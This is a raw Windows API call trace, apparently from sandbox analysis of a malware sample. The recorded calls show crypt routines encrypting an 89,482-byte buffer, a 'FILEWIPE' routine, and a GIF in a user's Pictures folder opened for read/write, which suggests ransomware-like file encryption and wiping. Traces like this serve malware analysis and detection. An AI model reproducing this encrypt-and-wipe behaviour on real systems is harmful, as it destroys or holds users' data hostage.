RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0188.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.506] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.506] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.507] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.507] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.507] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.508] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x15d8a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x15d90) returned 1 [0188.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.508] CharLowerBuffW (in: lpsz="byte[89489]", cchLength=0xb | out: lpsz="byte[89489]") returned 0xb [0188.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.510] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.510] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.513] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8ab38*, pdwDataLen=0x87e820*=0x15d8a, dwBufLen=0x15d90 | out: pbData=0xa8ab38*, pdwDataLen=0x87e820*=0x15d90) returned 1 [0188.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.517] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.517] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.517] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.535] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.535] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.535] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.535] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.550] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0188.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.550] CryptDestroyKey (hKey=0x90aed8) returned 1 [0188.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.551] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.551] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.551] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.551] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.551] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.551] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0188.551] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.551] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.552] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.552] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.552] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.552] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.552] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.552] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0188.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.553] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.553] FreeLibrary (hLibModule=0x74f20000) returned 1 [0188.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.554] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.555] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0188.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.555] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0xcdcdd000, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 0x90af58 [0188.555] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0188.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.556] CharLowerBuffW (in: lpsz="byte[89482]", cchLength=0xb | out: lpsz="byte[89482]") returned 0xb [0188.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.556] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0188.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.556] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0188.556] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0188.557] FreeLibrary (hLibModule=0x75c90000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.558] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.558] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0188.558] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cczf5rk8bht5t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0188.559] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 